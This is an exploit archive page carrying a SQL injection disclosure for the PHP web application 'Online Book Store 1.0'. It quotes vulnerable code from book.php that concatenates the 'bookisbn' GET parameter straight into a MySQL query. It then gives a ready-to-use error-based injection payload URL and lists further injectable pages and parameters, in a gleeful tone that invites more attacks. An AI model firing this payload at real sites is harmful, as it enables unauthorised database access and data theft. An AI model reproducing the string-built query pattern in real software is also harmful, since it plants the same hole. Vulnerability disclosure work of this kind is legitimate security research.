Online Book Store 1.0 SQL Injection

Online Book Store 1.0 SQL Injection: Posted Jan 15, 2020; Authored by AmirHadi Yazdani; Online Book Store version 1.0 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 2c087023f805b4cfebb619172cc89b843972b84b1ffb24b39661919e514fc2dc; Download | Favorite | View

Online Book Store 1.0 SQL Injection

# Exploit Title: Online Book Store 1.0 -  'bookisbn' SQL Injection
# Google Dork: N/A
# Date: 2020-01-15
# Exploit Author: AmirHadi Yazdani (Ertebat Gostar Co.)
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Ubuntu 16.04
# CVE: N/A

-------------- Vulnerable code in book.php ( Line 1-25) -----------------------------------------------
  $book_isbn = $_GET['bookisbn']; // vulnerable param 
  // connecto database
  require_once "./functions/database_functions.php";
  $conn = db_connect();

  $query = "SELECT * FROM books WHERE book_isbn = '$book_isbn'"; // Injectable Point
  $result = mysqli_query($conn, $query);
  if(!$result){
    echo "Can't retrieve data " . mysqli_error($conn);
    exit;
  }

  $row = mysqli_fetch_assoc($result);
  if(!$row){
    echo "Empty book";
    exit;
  }

  $title = $row['book_title'];
  require "./template/header.php";
?>
      <!-- Example row of columns -->
      <p class="lead" style="margin: 25px 0"><a href="books.php">Books</a> > <?php echo $row['book_title']; ?></p> // results goes here
-------------------------------------------------------------------------------------------------------------------

Exploit POC :

# Parameter: bookisbn (GET)
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)

#Payload: 
http://site.com/book.php?bookisbn=123' AND (SELECT 9724 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9724=9724,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.Tables GROUP BY x)a) AND 'aJYp'='aJYp

-----------------------
Other Vulnerable Pages with Same vulnerability  :

[PAGE :bookPerPub.php], [PARAM : pubid ], [Method : GET], [Vulnerable Code : Line 6 & Line 16]

[PAGE :edit_book.php], [PARAM : publisher ], [Method : POST], [Vulnerable Code : Line 13 & Line 27 & Line 31]

[PAGE :checkout.php , Function : getBookByIsbn , Defined in database_functions.php], [PARAM : $isbn ], [Method : SESSION], [Vulnerable Code : Line 30 & Line 26 in database_functions.php]

and other pages .... :)

Also you can have more fun with Other XSS bugs too :)
----

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Online Book Store 1.0 SQL Injection

Online Book Store 1.0 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Online Book Store 1.0 SQL Injection

Share This

Online Book Store 1.0 SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems